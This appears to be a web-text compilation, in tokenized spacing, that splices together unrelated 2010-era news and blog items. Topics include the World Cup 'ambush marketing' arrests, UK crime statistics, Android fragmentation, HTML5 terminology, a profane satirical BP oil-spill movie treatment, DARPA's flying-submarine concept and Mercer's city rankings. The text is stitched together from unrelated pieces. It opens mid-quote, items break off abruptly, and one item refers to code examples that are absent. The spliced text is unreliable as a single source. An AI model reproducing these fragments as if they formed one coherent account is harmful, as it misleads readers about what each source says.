We feel that the steps we 've taken have improved the situation , but the issue is not yet entirely solved . "
As for TBK herself , she recently returned to blogging after a six - week hiatus , and she 's back on Twitter .
( Her website also now includes detailed advice from her webmaster on how to protect one 's privacy online . )
She 's working " miscellaneous odd jobs to make ends meet , " she tells Inc.com – " Still in job limbo and dealing with the effects of being a pariah .
I do n't even fit in with the sex bloggers ! "
She 's just finished an e-book for women that will be available in early July , she 's " pouring [ her ] heart and soul " into the website , and she has n't given up hope on a steady job with benefits .
In the meantime , she says she 's " living the authentic life .
I truly hope it pays off ! "
Aza Raskin , the head of UX at Mozilla , has released ContextFree.js and the corresponding site Algorithm Ink.
ContextFree.js is a port of Context Free Art by Chris Coyne , and uses the HTML5 Canvas element to render the incredibly simple Context Free grammar .
It makes rendering complex and beautiful art very simple .
For example , the following code :
Produces this image :
And the following code makes a dot that follows your mouse around the screen .
Obviously , this very small amount of code can produce some amazing results .
To showcase these , Aza has released Algorithm Ink which allows you to view the work of others and see their source code .
ContextFree.js is completely open source and is available on Google Code .
Check out Aza ’s extensive post here , and see examples of what ContextFree.js can do on Algorithm Ink .
Amazing work !
Image caption
The women were ejected from the stadium
Two Dutch women have appeared in court in South Africa over an alleged " ambush marketing " stunt at a World Cup match .
They were released on bail .
More than 30 women were ejected from the Johannesburg stadium on Monday during the match between Denmark and the Netherlands .
They were accused by Fifa of breaking strict rules on World Cup marketing .
They had all been wearing identical mini-dresses in Dutch orange , sold as part of a gift pack by a Dutch brewery .
It is outrageous two women have a jail term over their heads for wearing orange dresses in a stadium Maxime Verhagen , Dutch Foreign Minister
The two women appeared in a Johannesburg court on Wednesday under the Contravention of Merchandise Marks Act .
They were released on bail and ordered to return to court next Tuesday .
Dutch Foreign Minister Maxime Verhagen called the criminal charges " disproportionate " .
" It is outrageous that the two women have a jail term hanging over their heads for wearing orange dresses in a football stadium , " he said in a statement .
" If South Africa or Fifa wants to take a company to task for an illegal marketing action , they should start judicial procedures against the company and not against ordinary citizens walking around in orange dresses . "
The case has already led to the sacking of English football commentator and former footballer Robbie Earle .
He was found to have passed on some of the tickets used by the women from his allocation for friends and family , in breach of Fifa rules , and was promptly sacked by employer ITV .
Lucrative rights
Fifa , the world footballing body , said it had launched legal action against the Dutch brewery , Bavaria , but not the women in question .
It said it was up to the police how they should proceed .
With a large chunk of Fifa 's revenue coming from selling World Cup marketing rights , it vigorously pursues anyone who tries to associate itself with the tournament , reports the BBC's Jonah Fisher from Johannesburg .
Earlier this year a local low - cost airline was forced to withdraw an advertising campaign that boasted it was the " Unofficial National Carrier of the You - Know - What " .
Bavaria board member Peer Swinkels told Reuters news agency that Fifa 's reaction was " ridiculous " .
" Fifa does not have the monopoly on orange and people have the freedom to wear what they want , " he said .
Takis have enjoyed impressive growth in the snack world , with aggressive new flavors , and now the Blue ones are Taquitos .
net 's most popular snack review .
Former generals want Congress to act to give children better food in schools
Rising rates of obesity among young Americans could undermine the future of the US military , two retired generals have warned .
More than a quarter of young Americans are now too fat to fight , they said .
Writing in the Washington Post , the ex-commanders said the fat crisis ruled out more potential military service recruits than any other medical factor .
They want Congress to introduce laws to give US children better nutrition in schools , with less sugar , salt and fat .
John Shalikashvili and Hugh Shelton , both former chairmen of the US Joint Chiefs of Staff , wrote : " Obesity rates threaten the overall health of America and the future strength of our military . "
" We consider this problem so serious from a national security perspective that we have joined more than 130 other retired generals , admirals and senior military leaders in calling on Congress to pass new child nutrition legislation , " the commanders added .
The warning comes amid mounting fears that childhood obesity has turned into an " epidemic " affecting an astonishing one in three young American people .
Mr Shalikashvili and Mr Shelton pointed to post - school lunch laws from 1946 , which recognised that poor nutrition reduced the pool of military recruits .
" We must act , as we did after World War II , to ensure that our children can one day defend our country , if need be . "
Latest figures show expected effects of recession have not come about as risk of being crime victim reaches 30 - year low
Crime fell by 7 % in England and Wales during 2009 despite the recession , according to the latest set of crime figures , published today .
The dramatic drop in overall crime was accompanied by further falls in the levels of gun and knife crime , including a 21 % fall in fatal stabbings .
The latest British Crime Survey ( BCS ) results show a 1 % rise in violent crime , but Home Office statisticians said that this was not statistically significant and overall levels of violent crime remained stable .
Both the BCS and the number of offences recorded by police show a 7 % fall in overall crime in 2009 .
The number of offences recorded by the police in 2009 , 4.4 m , represents a fall of 340,000 in the past year and is now below the crime level recorded in 1997 when Labour came to power .
The sharp fall means the strong upward pressure on the crime rate due to the effects of the recession expected by Home Office criminologists has been avoided .
The long - term fall in the crime rate since 1995 is now one of the longest on record .
The biggest falls recorded by the police were in car crime ( down 16 % ) and criminal damage ( down 11 % ) .
On the BCS the largest falls were in theft from the person ( down 21 % ) and burglary ( down 12 % ) .
The only category which saw an increase in the police figures was sexual offences , which rose 2 % .
There were falls in all other violence categories , including robbery , burglary , theft , fraud , car crime and criminal damage .
The Association of Chief Police Officers ( Acpo ) said the figures show that the risk of being a victim of crime , which stands at 22 % , is now at its lowest for 30 years .
The figures also show that fear of crime and antisocial behaviour , which has long been out of kilter with the underlying long - term fall in the actual crime rate , is now going in the right direction .
The percentage of people saying they see a high level of antisocial behaviour in their neighbourhood has fallen from 17 % to 15 % in the past year .
The percentage who say they are " very worried " about violent crime is down from 14 % to 13 % and those who are " very worried " about burglary are down from 11 % to 10 % .
Six out of the seven indicators for antisocial behaviour show falls and only one , noisy neighbours , shows an increase .
There is also increased confidence in the police in dealing with antisocial behaviour : 51 % in 2009 said they dealt with crime issues that mattered to them locally , compared with 47 % in 2008 .
The 2 % rise in sexual offences on the police figures represents an increase from 52,104 to 53,239 , with most of the rise involving the most serious sexual offences .
Home Office research published alongside the figures shows that " acquisitive crime " , such as burglary , car crime , robbery and theft , has fallen by half since 1995 .
It says improved security at home and in cars has been a key factor , as well as changes in behaviour by crime victims , with a quarter of all adults saying they no longer leave property on show in their car .
Keith Bristow , Acpo's head of crime , said : " The latest recorded crime statistics and British Crime Survey results show police and community safety partners are making communities safer .
" Police recorded crime figures for the 12 months to December 2009 show a reduction of 7 % annually , while the British Crime Survey shows the risk of being a victim of crime is at the lowest level in almost 30 years . "
The home secretary , Alan Johnson , challenged Chris Grayling , the Conservative home affairs spokesman , to admit that crime has been falling : " If we are going to have an honest debate on crime then we need Chris Grayling to finally accept what repeated surveys all confirm : that crime has fallen and is still falling .
" Labour has invested in record numbers of police , with neighbourhood policing teams in every area committed to spending 80 % of time on the beat or visible in their community .
We are committed to using CCTV and DNA technology to catch criminals and ensured longer prison sentences for those convicted of the most serious offences .
" That 's a successful strategy for tackling crime – but one that the Tories and the Liberal Democrats would put at risk . "
Grayling acknowledged there had been " some improvement " but continued to criticise Labour 's approach : " Any improvement is obviously welcome , but we still live in a more dangerous country than when Labour came to power .
The government has presided over a surge in violence , while Labour 's target culture means the police spend more time on paperwork than on the beat .
" Knife crime remains a serious concern on our streets and Conservatives will make tackling it a priority .
Too many families have their lives ruined by low - level crime and antisocial behaviour .
This has got to change . "
Taco Belle & Sebastian is now going to just be my respository for juxtapositions of bands & plays on their names
with that i present 2 u…
Android is still relatively new to the world of smart phones with Blackberry , Windows Mobile , and now iPhone but it continues to evolve in leaps and bounds and many of us have seen the dust left in its tracks .
There is much talk going on in the world of Android with fragmentation , legacy , and an issue that simply does n't exist as the issue has been called .
Another phrase that I 've seen around the forums is that Android 1.6 is " the kiss of death " and those devices will probably never see the light of another update to their OS .
Although Andy Rubin has said that Android will eventually slow down to one update a year , in the mean time many people are still lost and confused wondering what will happen to their first generation beloved Android devices ?
Recently Microsoft has been in the spotlight with trying to get rid of Internet Explorer 6 due to it being archaic and buggy , and it really does seem like handset carriers and manufacturers are doing the same thing .
Before updating the devices that could carry the 2.1 update , HTC decided to make the Nexus One and Droid Incredible instead .
How soon were the " legacy devices " chucked aside ?
Very fast .
Advertisement
Andy Rubin has also claimed that there is no fragmentation , it 's legacy , and so is Windows '95 and Mac OS Tiger , but what happened to those computers and programs ?
They got dumped , chucked , and ditched for the next best thing , but those who have heavily invested in IE6 , those who are still holding on to it , is because their programs are heavily integrated .
Well , our phones are heavily integrated part of us too and can't really write them off as a tax deduction can we ?
Blackberry was also THE phone to have , whether to be cool or for business , but now that has changed to Android and even the creator of the cellphone uses an Android phone .
Blackberry gets less and less talk now and days , the last thing that made some waves was the Storm and its successor but SurePress was a quick kill to it .
So , what will be next ?
The beauty of Android is the fact that it 's new , powerful , customizable , and evolving beyond anything and faster than anyone anticipated .
And at the same time , that 's what is hurting it .
Recently the big scandal was with Samsung and their Behold II who will not receive anything after 1.6 , which once again affirms the phrase " the kiss of death " and these customized layers in which heavily compromise Android .
The Nexus One , running stock Android 2.1 will receive the next update once it is ready to launch due to not having any carrier restrictions and any other layers integrated that have to be , which the demo 2.2 Froyo release had HTC scrambling to prepare their Sense UI to be ready for the Droid Incredible and now the EVO 4G .
Our own Bryce Reeves has made a brilliant point on his article about the Behold II , in which he states that perhaps these new layers and UI skins for Android should be purchased through the Android Market or from the manufacturers ' website .
This would allow the user to pick and choose exactly what they want , and was n't that the purpose of Android ?
Giving the users what they want and not telling them what they want and what they can have .
The phrase " walled garden " has been used in describing Apple 's working of things , but the same can be said about how these manufacturers are putting their foot in their mouths when making such devices .
I strongly agree with Bryce and believe that this should serious be taken into consideration with Google and so that they can continue to monitor and enforce certain rules in making Android Phones , just like Windows is doing with their Windows Mobile 7 Series .
Advertisement
Google indirectly is slowly breaking us down in what we can't have , and with phrasing such as " legacy " and " fragmentation is the boogyman " to Android owners , what will happen to all first generation Android phones ?
What kind of homage is this to them ?
There would be no Nexus One without the G1 .
So will Android 1.6 and IE6 become lost forever , or will their manufacturers find some way to try and save the day ?
IE6's fate is sealed , is Android's ?
Only time will tell , as well as what is the next best thing to replace today 's best .
[ Disclosure : I work for Google , but this is no way an official statement from Google and is merely my own personal ramblings on the topic . ]
Recently some people have gotten themselves in a tizzy about using the term HTML5 to refer to more than just the spec .
I acknowledge that this is a noble quest , kind of like those who want to get the whole world to speak Esperanto .
Frankly it 's an impossible task at this point .
Language does n't respect who came up with a term ; it takes on a life of its own , and when a term has grown beyond one person you have to embrace and run with it .
I originally thought the term Open Web would become how people referred to these things .
" Oh , CSS3 , Geolocation , etc . ?
Those are Open Web technologies ! "
I was even part of a group here at Google called the Open Web Advocacy team that was all about pushing things like HTML5 , CSS3 , SVG , and more forward .
You know what ?
The term Open Web never really took off ; I would say the term " Open Web " and people would give me a quizzical look .
I even tried boiling it down to a succinct set of bullet points about what makes something an " Open Web Technology , " but no dice .
I was surprised when the term HTML5 ended up becoming the marketing brand -- I thought no one is going to use a technology term to refer to these things , but that is what happened .
We saw the same thing with the technical term Ajax and the more generic term Rich Internet Applications ( RIA ) .
Ajax took off , while the term Rich Internet Applications never went beyond being a somewhat awkward term .
People like to use the specific ( Ajax ) versus the generic ( RIA ) , so the term Ajax stuck and ended up growing to refer to any rich internet application ( see ? ) that involved the use of JavaScript , JSON , dynamic page updates , and more .
The reason we are seeing the term HTML5 growing into our new generic term for the next wave of web technologies is because HTML5 is the real show here .
Lots of ancillary technologies are riding the wave and opening HTML5 is making possible , including CSS3 , SVG , and more .
In addition , most people in the industry , even the vast majority of web developers , do n't really want to know about the specific sausage making behind HTML5 .
Do they really care that things like Local and SQL Storage were broken out of the main HTML5 spec ?
Do they care that the Web Socket protocol actually lives with the IETF now rather than being inside the HTML5 spec itself , as it originally was ?
Do they care about the " how many angels fit on the head of a pin " battles between HTML5 Microdata , RDFa , and Microformats ?
They do n't .
They just want to come up to speed on the newest developments and apply them to their jobs .
Sometimes when I want to be a bit more exact I will use the phrase " the HTML5 family of technologies " or " HTML5 ++ " , but both of those are a bit awkward and a mouth full .
Here 's a challenge for you : if you can come up with a better term , AND actually get the mass of developers and industry to use it , then more power to you .
Throw it out there and maybe it will take off .
I doubt that will happen though .
The language train has left the situation , and it looks like HTML5 is the new nom de guerre for a new iteration of the web .
As they say in Esperanto : " Ne far monto el papulo monteto . " i.e .
Do n't make a mountain out of a mole hill .
As President Obama takes to the airwaves to control the fallout from the Gulf , we turned to Hollywood and asked Lost executive producer Damon Lindelof for another solution BP has n't tried yet : a movie treatment .
UPDATE : Lindelof Pal ( andTransformers / Star Trek Scribe ) Roberto Orci Has a BP Movie Idea , Too !
Armageddoner !
By Damon Lindelof
A greedy , evil corporation has unwittingly created a natural disaster the likes of which the world has never seen .
Protocols were ignored .
Warnings were unheeded .
And none of the damn eggheads in Washington can seem to come up with a way to stop millions of barrels of crude from pumping into the goddamned Gulf , threatening our Americanism !
What we need , ladies and gentlemen , is experience .
Experts who know their way around an OIL RIG .
But not just any ROUGHNECKS .
No .
For this crazy plan to work , we 'll need men who have experience with SPACE TRAVEL .
Why ?
Because we 're gonna reverse - ARMAGEDDON this shit and call it a sequel .
FADE IN :
We OPEN on Billy Bob .
He does n't need the cane anymore — maybe he has some kind of Iron Man cyberleg or something .
This will be important later .
Just do n't ask me why .
The phone rings .
He answers it .
It 's the PRESIDENT .
African American will seem too current and 24 just did two seasons with a chick in the Oval Office , so I say we get real progressive up in here and go Jew .
Maybe Dreyfuss or Hoffman .
President Jew lays it out .
Tragedy in the Gulf .
Lives lost .
Massive ecological disaster .
But the public is only being told half the story .
If the other half were revealed , they'd be rioting in the goddamned streets ( end of Act Two , by the way ) so Billy Bob had better sit down .
VROOOVK ! — with a whir of knee - servo-motors , Billy Bob does just that , " Tell me , Mr. President . "
And in a series of totally awesome CGI graphics ( this thing is in 3D , bitches ) we learn that through history , GEOLOGISTS have conspired to hide the truth of our own planet from us — that , in fact , the Earth does not have a molten core but instead , a core comprised entirely of OIL .
And armed with that secret knowledge ( the Vatican should be in on this , too — let 's tap that Da Vinci Code audience ) , corporations have been racing to TAP that oil , thus controlling our long - term energy supply and blahblahblah who gives a shit , we GET IT !
But the headline is THIS :
Now that the core has been tapped , it is spewing like a sailor on shore leave .
And if it can't be stopped ?
The core of the planet will empty out .
And then ?
The Earth will fucking COLLAPSE !!!
Billy Bob takes a dramatic pause and quietly says " Good God , Mr. President .
We 're all dead . "
( Trailer moment . )
But then he realizes why the President has called HIM of all people .
Because he 's saved the world before .
He hatched the plan .
He put it into action .
He got a team of roughnecks off an oil rig and into OUTER SPACE to nuke an asteroid that was threatening our way of life .
But what 's that got to do with the oil leak ?
Well , the wonks at NASA have found an ASTEROID that will pass by Earth in about three days .
On its current path , it 'll miss us by a good million miles or so .
But if ... dammit , IF ... someone were to go up there and detonate a calibrated warhead on that damn thing , its trajectory could be altered .
Altered so specifically that it could be made to hit a very specific target .
A target on the floor of the Gulf of Mexico .
It can plug that leak .
Yes .
Once such an asteroid threatened to destroy us all .
But now ?
It 's our only chance at salvation .
( Movie poster tagline ! )
CLOSE ON Billy Bob .
Moment of truth .
It 's too much .
There 's no time .
He 's retired now .
And he has a drinking problem and an ex-wife who does n't respect him .
It 's just him and his bionic leg on a horse farm in Wyoming .
He shakes his head as President Hoffman awaits his answer .
Then , finally , " I know you do n't believe in Jesus Christ , sir ... how the hell can you believe in me ? "
Hoffman sighs : " Because you were the only one who answered the damn phone . "
( Trailer moment No. 2 . )
And this , ladies and gentlemen , is only the first PAGE AND A HALF of the movie .
Bay 's in .
He loves the " James Cameron fucking environmental message bullshit " of it .
Willis wants to do it , even though he seems to have forgotten he died in the first one .
If we want him , easy enough to say he's a twin brother or do some time travel thingamajob once they get into space .
Normally , I hate sequels , but this is a no - brainer .
Literally .
Whaddaya think ?
Think you can do better ?
Create your own poster for Armageddoner ! — if we like it , we 'll feature it right here on Esquire.com .
E-mail your art to politicsblog@esquire.com , and share your oil - spill movie ideas on Twitter .
Damon Lindelof is the co-creator of Lost as well as the producer of Star Trek and its upcoming sequel .
Having worked in New Orleans after Hurricane Katrina , he is deeply and profoundly affected by the spill in the Gulf and sickened by the tragedy on both an ecological and human level .
Fuck BP .
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
Video : “ Stingray fin ” boat ( see box at end of article )
Flying underwater ( Image : Simon Danaher )
GUILLEMOTS and gannets do it .
Cormorants and kingfishers do it .
Even the tiny insect - eating dipper does it .
And if a plan by the Pentagon ’s Defense Advanced Research Projects Agency ( DARPA ) succeeds , a remarkable airplane may one day do it too : plunge beneath the waves to stalk its prey , before re-emerging to fly home .
The DARPA plan , announced in October 2008 , calls for a stealthy aircraft that can fly low over the sea until it nears its target , which could be an enemy ship , or a coastal site such as a port .
It will then alight on the water and transform itself into a submarine that will cruise under water to within striking distance , all without alerting defences .
That , at least , is the plan .
The agency is known for taking on brain - twistingly difficult challenges .
So what about DARPA ’s dipper ?
Is it a ridiculous dream ?
“ A few years ago I would have said that this is a silly idea , ” says Graham Hawkes , an engineer and submarine designer based in San Francisco .
“ But I do n’t think so any more . ”
Advertisement
DARPA , which has a $ 3 billion annual budget , has begun to study proposed designs .
In the next year or so it could begin allocating funding to developers .
Though the agency itself is unwilling to comment , Hawkes and others working on rival designs have revealed to New Scientist how they would solve the key problems involved in building a plane that can travel under water – or , to put it another way , a flying submarine .
The challenges are huge , not least because planes and submarines are normally poles apart .
Aircraft must be as light as possible to minimise the engine power they need to get airborne .
Submarines are heavyweights with massive hulls strong enough to resist crushing forces from the surrounding water .
Aircraft use lift from their wings to stay aloft , while submarines operate like underwater balloons , adjusting their buoyancy to sink or rise .
So how can engineers balance the conflicting demands ?
Could a craft be designed to dive into the sea like a gannet ?
And how will it be propelled – is a jet engine the best solution , both above and below the waves ?
“ Aircraft must be light to minimise the power needed to get airborne , while subs need massive hulls to resist crushing ”
According to Norman Polmar , former adviser on naval strategy and technology to the US government , the starting point must be to find a way to make an aircraft that can sink in water .
“ Submarines cannot fly , ” he says , “ but seaplanes can submerge . ”
This was the thinking behind what was probably the first stab at a flying submarine .
In 1934 Boris Petrovich Ushakov , a student engineer at a Soviet military academy , devised a flying underwater boat – a three - engined floatplane designed to scout out enemy ships and then ambush them .
Ushakov envisaged his craft flying ahead of the target , landing on the sea and then flooding its fuselage so that it could lie in wait beneath the surface and torpedo the ships as they sailed past .
Ushakov submitted his radical design , which included a conning tower and periscope , to senior officers in 1936 .
But the concept was never put into practice , being deemed too heavy to be effective .
It took another three decades before a flying sub appeared for real .
This was a craft built in 1962 by Donald Reid , an engineer at aircraft manufacturer North American Aviation .
The Reid Flying Submarine ( RFS - 1 ) was a true mongrel , constructed by Reid in his spare time using leftover parts from other aircraft and , like Ushakov ’s design , it was a floatplane .
The craft proved able to dive to a depth of a few metres in tests , but was so heavy it could only make short hops into the air .
Though this was at the height of the cold war , the US navy showed little interest in Reid ’s machine .
That may have been because the navy had already commissioned another aircraft manufacturer , Convair , to build what became known as the “ subplane “ .
It dispensed with heavy floats , relying instead on its streamlined fuselage , like the hull of a flying boat , to land on the water .
In a paper in the September 1964 issue of Naval Institute Proceedings ( p 144 ) , hydrodynamics engineer Eugene Handler at the US Bureau of Naval Weapons claimed this flying sub would be ideal for attacking Soviet shipping in the Baltic , Black and Caspian seas .
Convair drew up detailed designs and even built scale models which were tested in water tanks .
Though the results looked promising , the project never made it any further ; it was cancelled by Congress in 1966 .
So is DARPA ’s new project destined for a similar fate ?
“ What the Americans want sounds incredibly ambitious , ” says UK Royal Navy commander Jonty Powis , head of NATO ’s submarine rescue service .
“ If they achieve half of what they want from this machine they will be doing well . ”
Others are more optimistic , especially in the light of advances in engineering and materials science since the last attempt – notably in lightweight carbon fibre composites and energy - dense batteries .
“ There ’s probably no reason why it ca n’t be done , ” says Hawkes .
There is general agreement that Convair ’s hull design was sound .
Landing on a flying - boat - style fuselage and doing away with cumbersome floats should make the craft lighter and faster both in the air and under water .
But once the craft is on the water , how best to get it to dive ?
Simply flooding the fuselage with water is one solution , but this means the crew would have to be kitted out with scuba equipment .
Housing the crew in a watertight cabin is obviously preferable , and to counter its buoyancy Polmar suggests borrowing another idea from Convair ’s design – floodable fuel tanks .
If the fuel in the tanks is held in a rubber bladder , the craft can be submerged by letting water into the void vacated by fuel used on the outward trip .
When it ’s time to surface , the water can simply be pumped out .
For propulsion under water , electric power is the preferred option , according to Ian Poll , an aerospace engineer at Cranfield University in the UK .
“ Using batteries to drive electric motors when submerged could have another benefit , ” he says : their weight would help counter the craft ’s buoyancy .
Unfortunately batteries could severely undermine the sub ’s airworthiness .
In a report titled “ Conceptual Design of a Submersible Tactical Insertion Aircraft “ , published last year by the American Institute of Aeronautics and Astronautics , a team of engineering students at Auburn University in Alabama calculated that the batteries required for a sub capable of travelling 44 kilometres under water – a distance specified by DARPA – will weigh as much as all the other components of the vessel combined , making it too heavy to fly .
So rather than using electric power , the Auburn team favours propelling the vessel with a gas turbine fed by air drawn in through a 10 - metre snorkel .
That means the sub will have to stay close to the surface .
While DARPA has yet to specify at what depth the flying sub should operate , being restricted to a limited depth might not matter .
“ As long as it is not visible , there ’s not much reason to dive far below the surface , ” says Bob Allwood , engineer and chief executive of the Society for Underwater Technology in London .
“ The problem is that the craft has still got to be slightly denser than water to submerge . ”
Hawkes , however , does not see this as a problem .
In fact he does n’t accept that the craft has to be made heavier to sink beneath the waves , any more than a normal aircraft has to become more buoyant to take off .
“ You ca n’t build an aeroplane that is also a balloon , and an aeroplane ca n’t go under water in the same way a sub does .
You ’re mixing two fundamentally different modes of operation . ”
Hawkes already builds submarines that are lighter than water ( New Scientist , 12 February 2000 , p 36 ) .
To overcome their natural buoyancy and keep them below the surface , they are equipped with wings that generate downward “ lift ” .
“ Think about it as flying under water , ” he says .
“ It can be done .
It just needs a lot of work . ”
“ A submersible that is lighter than water needs wings that generate downward ‘ lift ’ ”
Into the deep
To operate below the waves as well as above them , these wings will have to be a bit out of the ordinary .
“ One important thing is that the craft ’s wings will need a symmetrical aerofoil , unlike the asymmetrically curved wing that gives aircraft lift , ” he says .
So when the craft is airborne , the wing will need a positive “ angle of attack ” : in other words , it will need to be angled upwards relative to the airflow .
To achieve this , the craft will have to fly in a nose - up attitude .
Conversely , when under water it will need a negative angle of attack , so the craft will travel nose - down ( see diagram ) .
Hawkes has already built a stubby - winged submersible called the Super Falcon that can “ fly ” down to 300 metres , about 10 times deeper than a scuba diver .
Redesigned with aero engines and larger wings , it could be made to fly at about 900 kilometres per hour with its nose angled up by about 5 degrees , Hawkes says .
Under water it should manage around 10 knots ( 18 kilometres per hour ) .
At these speeds , the characteristics of the air and water flow – defined by a parameter known as the Reynolds number – are roughly the same , so the craft ’s control surfaces should work in both environments .
Hawkes admits that an awful lot of power will be needed to get the Super Falcon airborne , and only jet engines have enough oomph to do the job .
Polmar agrees , and points out that the piston engines used in conventional light planes are ruled out for other reasons : they would fail if any water leaked into the cylinders .
“ You can not immerse a reciprocating engine and expect it to work , ” he says .
But protect a jet engine against saltwater corrosion and position it high on the craft so the spray does n’t enter the intake during take - off and landing , and it will work fine .
Russian aircraft maker Beriev has proved this with its Be-200 amphibious plane .
In fact , Hawkes foresees jet engines playing a dual role , propelling the plane through the water as well as through the air .
There ’s no reason why the compressor and turbine blades in a jet engine ca n’t be driven by an electric motor to generate thrust under water , he says .
It should be possible to build an engine that runs on kerosene in air and switches to electricity when submerged .
Others are already thinking along these lines .
Last year , aircraft manufacturer Airbus patented a hybrid electric jet engine for airliners which can be powered by both conventional kerosene and electricity .
Most jet engines have an electric starter motor , and this motor could spin the turbine ’s shaft under water , Hawkes suggests .
The blades would rotate more slowly than normal , he says , and the engine wo n’t be particularly efficient .
“ But I believe this could work perfectly well . ”
The Auburn students came up with much the same strategy in their design , opting for a type of gas turbine called a turboshaft to get the best performance .
Equipped with large rotor blades and gears to adjust its speed , a turboshaft unit offers “ acceptable efficiency ” in both air and water , they say .
Alternatively the air could be fed to a fuel cell to generate electricity to spin the blades .
But there is one stumbling block to Hawkes ’s scheme for using a conventional jet engine for propulsion in air and water .
“ You ca n’t let cold seawater get at a hot engine because the thermal shock will blow it apart , ” warns engineer Jim McKenna of the UK Civil Aviation Authority , who has previously researched submersible systems .
“ It takes a long , long time to cool down a jet engine : the turbine runs at somewhere between 500 and 600 °C , ” he says .
In other words , without some innovative thinking , a jet - powered sub might have to wait hours on the surface before its engines are cool enough for it to dive .
Should Hawkes ’s buoyant design win out , getting it to sink low enough in the water for its wings to start creating downward forces could also be a problem .
Hawkes has a dramatic solution : copy what diving birds do .
“ You might have to put the nose down and literally dive , smack , into the water , ” he says .
Taking inspiration from birds would put submersible - aircraft engineers in illustrious company : 19th - century glider pioneer Otto Lilienthal and the early 20th - century inventors of powered flight , the Wright brothers , are among those who did so – though it ’s no guarantee of success in this case .
Whatever happens , says Hawkes , “ it would certainly be spectacular ” .
As stealthy as a fish Fish of the family Rajidae , which includes stingrays and skate , swim by flicking the outer edges of their fins .
Victor Krylov from Loughborough University in the UK believes that winged submarines might be able to do the same ( Ocean Engineering , vol 37 , p 378 ) .
He suggests using electric motors or shape - memory materials to repeatedly flick the end of a flexible , wedge - shaped wing , creating a wave that ripples backwards and generates forward thrust .
Tests using model boats equipped with undulating rubber keels have shown that the rippling effect works , though it is less efficient than a conventional propeller ( Applied Acoustics , vol 68 , p 97 ) .
But importantly for the US Defense Advanced Research Projects Agency , which is about to commission development work on flying submarines , the “ rajiform ” drive should be far quieter than propellers , making craft harder to detect .
And , he says , a vessel ’s crew would not feel vibrations with a wedge - shaped wing , as the wave remains confined near the wing tip .
London received the same score as it did in last year 's survey London is the only UK city to have been ranked in a global top 50 for quality of living , but comes in at a lowly 39th spot , a new survey has suggested .
The study was based on factors including crime , political stability , hospitals , transport , food and drink , leisure , climate and personal freedom .
The Mercer Quality Of Living ranking assesses 221 cities to help governments and firms place staff on assignments .
Vienna was ranked at the top of the list for the second year running .
London was followed by Aberdeen at 53rd position , Birmingham at 55 , Glasgow at 57 and Belfast at number 63 .
Mercer carries out the study to help governments and companies compensate employees fairly when sending them on international assignments .
Baghdad at bottom
The least desirable city of the 221 in the study was the Iraqi capital Baghdad , placed at the bottom of the list due to its lack of safety and stability .
European cities dominated the spots in the index , with Zurich and Geneva in Switzerland in second and third place and the German cities of Dusseldorf , Frankfurt and Munich in sixth and joint seventh place .
Dublin was ranked in 26th place .
TOP 10 CITIES 1 . Vienna , Austria 2 . Zurich , Switzerland 3 . Geneva , Switzerland 4 . Vancouver , Canada 4 .
Auckland , New Zealand 6 . Dusseldorf , Germany 7 . Frankfurt , Germany 7 .
Munich , Germany 9 . Bern , Switzerland 10 .
Sydney , Australia Source : Mercer 2010 Quality of Living Survey
Send us your comments Slagin Parakatil , senior researcher at Mercer , said : " As the world economy becomes more globalised , cities beyond the traditional financial centres are emerging as attractive places in which to expand or establish a business .
" Cities in many emerging markets , such as in the Middle East or Asia , have seen a significant influx of foreign companies and their expatriate employees in recent years .
" To ensure their expatriates are compensated appropriately and an adequate hardship allowance is included in their benefits package , companies seek a clear picture of the quality of living in these cities .
" We have reviewed our index to reflect these developments and it now better represents the cities that most interest our clients . "
What do you love or hate about your city ?
Send your city pictures to yourpics@bbc.co.uk or text them to 61124 if in the UK or +44 7725 100 100 from outside the UK .
If you have a large file you can upload here .
Read the terms and conditions
At no time should you endanger yourself or others , take any unnecessary risks or infringe any laws .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
May 3 , 2010
https://www.lewrockwell.com/podcast/148-nullification/
Lew Rockwell interviews Tom Woods , on his new book , Nullification : How to Resist Federal Tyranny in the 21st Century .
Thanks to the internet , Americans can learn about such forbidden ideas as the Principles of 1798 , when Jefferson and Madison laid out the idea that to give the central government the sole ability to interpret the constitution was the path to tyranny , and that the states have the right and the duty to oppose tyrannical actions by the feds .
Regimists try to demonize the idea of nullification , as they attempt to demonize all ideas that undermine centralized power , but that is not scaring libertarians , Tea Party people , and other dissidents .
Nullification , decentralization , self - government , self - determination , even secession : the time of these un -PC ideas is here , and the Woods book may be the handbook of the revolution .
Websites :
http://www.tenthamendmentcenter.com/
* includes a legislative tracking page
http://www.werefuse.com/
* declares the national health care law Unconstitutional
http://www.thomasewoods.com/
* Tom ’s personal web page
https://archive.lewrockwell.com/
* all the best of the articles here
Tom Woods ’s Past Articles on LewRockwell.com
nat geo gets gun-shy on ancient astronauts
NatGeo gave ancient astronaut theorists the time of day , but did little to rebuke their pseudoscientific arguments in a rare miss .
When watching the last episode of NatGeo ’s Known Universe , an episode focused on ancient astronomy and the discoveries made by our ancestors , I came across the last thing I ’d expect from a popular science show of this caliber .
Today , the ancient astronaut theory is so widespread , pretty much every recounting of astronomy in the ancient world has to at least mention our desire to connect classical folklore with our ideas about aliens and their potential intervention in our history .
And that ’s all well and good when put into its proper context as a critical thinking exercise .
However , recounting the offered evidence for this notion without offering any rebuttals which tackle specific points and give viewers a scientifically backed evaluation of what they just heard , playing up the mysteries and the unknowns for the sake of dramatic effect is simply unsound .
But that ’s the approach taken by the editors at NatGeo who gave an ancient astronaut theorist a virtually uninterrupted monologue .
Now , to be as fair as possible , we have to note that the notion of ancient astronauts often gets categorized as the kind of New Age mythology we ’d expect from crazed conspiracy theorists who believe that alien lizards rule our world from the shadows , and often unfairly so .
There is no law of nature which would forbid an alien species to evolve intelligence , start building large and powerful spacecraft , and eventually make their way to a world orbiting around another star .
Sure , it might take a very long time for all these things to happen and there is a very real chance that an intelligent alien species wo n’t exist long enough to do it , but it ’s not completely out of the question .
Just look at us .
We could be less than a century away from technologies that let us slowly make our way to our nearest stars .
So while creationists may misrepresent Dawkins as a believer in ancient alien visitors who helped our ancestors build civilization , then hypocritically make fun of him as they preach that an invisible , incomprehensible , omnipotent being designed the universe by magic , the ancient astronaut theorists actually do have some legitimate science on their side , even if the odds of an alien civilization with a fleet of interstellar vehciles visiting Earth at just the right time in a 100,000 light year wide galaxy with roughly a trillion planets require coincidences of , quite literally , astronomical orders of magnitude .
